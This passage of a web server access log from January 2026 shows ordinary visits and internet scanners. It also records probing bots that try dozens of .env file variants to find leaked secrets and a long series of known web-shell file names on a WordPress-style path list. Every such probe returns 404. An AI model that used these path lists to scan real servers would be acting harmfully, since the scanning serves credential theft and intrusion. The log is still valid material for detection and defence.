Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:19:22:18 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[29/Jan/2026:19:37:14 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:19:46:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/.env" [Client 45.55.94.78] [Length 122] [Gzip 1.35] "python-requests/2.32.4" "-" +[29/Jan/2026:19:54:33 +0000] 200 - GET http 91.82.215.191 "/" [Client 172.239.110.140] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" +[29/Jan/2026:19:54:51 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[29/Jan/2026:19:59:50 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:20:03:30 +0000] 200 - GET http pma.profibot.synology.me "/" [Client 185.247.137.83] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" "-" +[29/Jan/2026:20:03:30 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:20:07:26 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:20:08:53 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:20:16:36 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 66.132.153.137] [Length 154] [Gzip -] "-" "-" +[29/Jan/2026:20:16:39 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 66.132.153.137] [Length 154] [Gzip -] "-" "-" +[29/Jan/2026:20:27:37 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:20:36:31 +0000] 404 - GET http 91.82.215.191 "/cgi-bin/luci/;stok=/locale" [Client 89.42.231.200] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:20:38:01 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[29/Jan/2026:20:46:50 +0000] 200 - GET http 91.82.215.191 "/" [Client 206.168.34.53] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[29/Jan/2026:20:46:52 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.168.34.53] [Length 154] [Gzip -] "-" "-" +[29/Jan/2026:20:46:53 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.168.34.53] [Length 154] [Gzip -] "-" "-" +[29/Jan/2026:20:46:55 +0000] 400 - GET http 91.82.215.191 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[29/Jan/2026:20:47:17 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.168.34.53] [Length 154] [Gzip -] "-" "-" +[29/Jan/2026:20:47:20 +0000] 404 - GET http 91.82.215.191 "/robots.txt" [Client 206.168.34.53] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[29/Jan/2026:20:47:22 +0000] 404 - GET http 91.82.215.191 "/cgi-bin/luci/;stok=/locale" [Client 91.224.92.115] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:20:51:20 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:20:58:03 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[29/Jan/2026:20:59:30 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:21:05:58 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:21:07:55 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:21:16:06 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:21:17:11 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; SM-G925F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" "-" +[29/Jan/2026:21:24:07 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[29/Jan/2026:21:26:08 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.239.110.140] [Length 154] [Gzip -] "-" "-" +[29/Jan/2026:21:26:08 +0000] 200 - GET http 91.82.215.191 "/" [Client 172.239.110.140] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" +[29/Jan/2026:21:26:22 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.69] [Length 1033] [Gzip -] "-" "-" +[29/Jan/2026:21:41:40 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[29/Jan/2026:21:42:32 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:21:53:03 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:21:55:09 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[29/Jan/2026:21:55:32 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[29/Jan/2026:21:56:59 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:21:58:23 +0000] 404 - GET http 91.82.215.191 "/cgi-bin/luci/;stok=/locale" [Client 89.42.231.200] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:22:04:59 +0000] 400 - GET http 91.82.215.191 "/" [Client 152.32.247.22] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 8_0; Win64; x64) AppleWebKit/600.46 (KHTML, like Gecko) Chrome/69.0.2522 Safari/537.36" "-" +[29/Jan/2026:22:04:59 +0000] 400 - GET http 91.82.215.191 "/favicon.ico" [Client 152.32.247.22] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[29/Jan/2026:22:05:00 +0000] 400 - GET http 91.82.215.191 "/sitemap.xml" [Client 152.32.247.22] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[29/Jan/2026:22:05:00 +0000] 400 - GET http 91.82.215.191 "/robots.txt" [Client 152.32.247.22] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[29/Jan/2026:22:05:59 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:22:06:36 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:22:31:01 +0000] 200 - GET http 91.82.215.191 "/" [Client 87.121.84.51] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" +[29/Jan/2026:22:32:26 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:22:37:39 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[29/Jan/2026:22:41:32 +0000] 404 - GET http 91.82.215.191 "/.env" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174" "-" +[29/Jan/2026:22:41:32 +0000] 404 - GET http 91.82.215.191 "/.env.mailer_url" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (iPad; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" "-" +[29/Jan/2026:22:41:33 +0000] 404 - GET http 91.82.215.191 "/.env-test-stage" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Android 4.4.2; Tablet; rv:57.0) Gecko/57.0 Firefox/57.0" "-" +[29/Jan/2026:22:41:33 +0000] 404 - GET http 91.82.215.191 "/.env.local.dist" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)" "-" +[29/Jan/2026:22:41:33 +0000] 404 - GET http 91.82.215.191 "/.env-import.env" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" "-" +[29/Jan/2026:22:41:33 +0000] 404 - GET http 91.82.215.191 "/.env-test-suite" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 920) like Gecko" "-" +[29/Jan/2026:22:41:33 +0000] 404 - GET http 91.82.215.191 "/.env.live.local" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/538.1 (KHTML, like Gecko) fancybrowser Safari/538.1" "-" +[29/Jan/2026:22:41:33 +0000] 404 - GET http 91.82.215.191 "/.env-threaddump" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 4.4.4; SM-G360V Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.76 Mobile Safari/537.36" "-" +[29/Jan/2026:22:41:33 +0000] 404 - GET http 91.82.215.191 "/.env-health.log" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; wbx 1.0.0)" "-" +[29/Jan/2026:22:41:33 +0000] 404 - GET http 91.82.215.191 "/.env-header.env" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393" "-" +[29/Jan/2026:22:41:33 +0000] 404 - GET http 91.82.215.191 "/.env-csrf-token" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; fr-fr) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1" "-" +[29/Jan/2026:22:41:33 +0000] 404 - GET http 91.82.215.191 "/.env-gitmodules" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "-" +[29/Jan/2026:22:41:34 +0000] 404 - GET http 91.82.215.191 "/.env-gitlab.log" [Client 78.153.140.224] [Length 150] [Gzip -] "Opera/9.80 (Android 2.3.6; Linux; Opera Mobi/ADR-1301071820) Presto/2.11.355 Version/12.10" "-" +[29/Jan/2026:22:41:34 +0000] 404 - GET http 91.82.215.191 "/.env-github.log" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; G2 Build/ICS.Trio_Stealth_G2.20130321) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30" "-" +[29/Jan/2026:22:41:34 +0000] 404 - GET http 91.82.215.191 "/.env-server.log" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.10 (KHTML, like Gecko) Chrome/2.0.157.2 Safari/528.10" "-" +[29/Jan/2026:22:41:34 +0000] 404 - GET http 91.82.215.191 "/.env-sample.env" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Mobile Safari/537.36" "-" +[29/Jan/2026:22:41:34 +0000] 404 - GET http 91.82.215.191 "/.env-prod-local" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6" "-" +[29/Jan/2026:22:41:34 +0000] 404 - GET http 91.82.215.191 "/.env-token-list" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (iPod touch; CPU iPhone OS 8_1_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B466 Safari/600.1.4" "-" +[29/Jan/2026:22:41:34 +0000] 404 - GET http 91.82.215.191 "/.env-controller" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.0.5) Gecko/20060731 Ubuntu/dapper-security Firefox/1.5.0.5" "-" +[29/Jan/2026:22:41:34 +0000] 404 - GET http 91.82.215.191 "/.env-tokens.log" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc" "-" +[29/Jan/2026:22:41:34 +0000] 404 - GET http 91.82.215.191 "/.env-spider.env" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 7.1.1; SAMSUNG SM-T350 Build/NMF26X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/6.4 Chrome/56.0.2924.87 Safari/537.36" "-" +[29/Jan/2026:22:41:35 +0000] 400 - GET http 91.82.215.191 "/.env-builder.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[29/Jan/2026:22:41:35 +0000] 404 - GET http 91.82.215.191 "/.env-buildtools" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[29/Jan/2026:22:41:35 +0000] 404 - GET http 91.82.215.191 "/.env-top100.env" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4" "-" +[29/Jan/2026:22:41:36 +0000] 404 - GET http 91.82.215.191 "/.env.mailer_dsn" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0; Touch; MASMJS)" "-" +[29/Jan/2026:22:41:36 +0000] 404 - GET http 91.82.215.191 "/.env-export.env" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.2) Gecko/2008092213 Ubuntu/8.04 (hardy) Firefox/3.0.2" "-" +[29/Jan/2026:22:41:36 +0000] 404 - GET http 91.82.215.191 "/.env.php-backup" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; BOIE9;ENUSMSE)" "-" +[29/Jan/2026:22:41:36 +0000] 404 - GET http 91.82.215.191 "/.env.config.bak" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:65.0) Gecko/20100101 Firefox/65.0" "-" +[29/Jan/2026:22:41:36 +0000] 404 - GET http 91.82.215.191 "/.env-top500.env" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.2; en-us; DROID2 GLOBAL Build/S273) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[29/Jan/2026:22:41:36 +0000] 404 - GET http 91.82.215.191 "/.env-runner.log" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.3)" "-" +[29/Jan/2026:22:41:36 +0000] 404 - GET http 91.82.215.191 "/.env-config.yml" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre" "-" +[29/Jan/2026:22:44:30 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:22:45:12 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 164.92.244.132] [Length 154] [Gzip -] "-" "-" +[29/Jan/2026:22:47:56 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:22:53:18 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:22:58:42 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:23:03:13 +0000] 404 - GET http 91.82.215.191 "/cgi-bin/luci/;stok=/locale" [Client 91.224.92.115] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:04:04 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:23:11:48 +0000] 200 - GET http 91.82.215.191 "/" [Client 147.185.132.237] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[29/Jan/2026:23:17:13 +0000] 404 - GET http 91.82.215.191 "/cgi-bin/luci/;stok=/locale" [Client 89.42.231.200] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:21:11 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:23:22:35 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:35 +0000] 404 - GET http profibot.direct.quickconnect.to "/sa.php7" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:35 +0000] 404 - GET http profibot.direct.quickconnect.to "/gettest.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/menu.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/bjfl.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/sko.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/obfuscate.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:37 +0000] 404 - GET http profibot.direct.quickconnect.to "/img.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:37 +0000] 404 - GET http profibot.direct.quickconnect.to "/co.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:37 +0000] 404 - GET http profibot.direct.quickconnect.to "/iswfg.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:37 +0000] 404 - GET http profibot.direct.quickconnect.to "/acxx.php?p=" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:38 +0000] 404 - GET http profibot.direct.quickconnect.to "/black.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:38 +0000] 404 - GET http profibot.direct.quickconnect.to "/up.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:38 +0000] 404 - GET http profibot.direct.quickconnect.to "/wikindex.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:38 +0000] 404 - GET http profibot.direct.quickconnect.to "/tool.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:38 +0000] 404 - GET http profibot.direct.quickconnect.to "/py.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:39 +0000] 404 - GET http profibot.direct.quickconnect.to "/155.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:39 +0000] 404 - GET http profibot.direct.quickconnect.to "/sym404.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:39 +0000] 404 - GET http profibot.direct.quickconnect.to "/iko.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:39 +0000] 404 - GET http profibot.direct.quickconnect.to "/wefile.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:40 +0000] 404 - GET http profibot.direct.quickconnect.to "/gfd.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:40 +0000] 404 - GET http profibot.direct.quickconnect.to "/xmlrpc.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:40 +0000] 404 - GET http profibot.direct.quickconnect.to "/bnm.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:40 +0000] 404 - GET http profibot.direct.quickconnect.to "/edit-tags.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/vx.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/lkj.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/ioxi-o.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/js/wp-conflg.php?p=" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/about/function.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/block-patterns/index.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/maint/about.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/readme.php?p=" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/js/codemirror/index.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/classwithtostring.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/1.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/.well-known/index.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:43 +0000] 404 - GET http profibot.direct.quickconnect.to "/alfa.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/images/wp-login.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/atx.php" [Client 20.89.97.111] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:23:22:44 +0000] 404 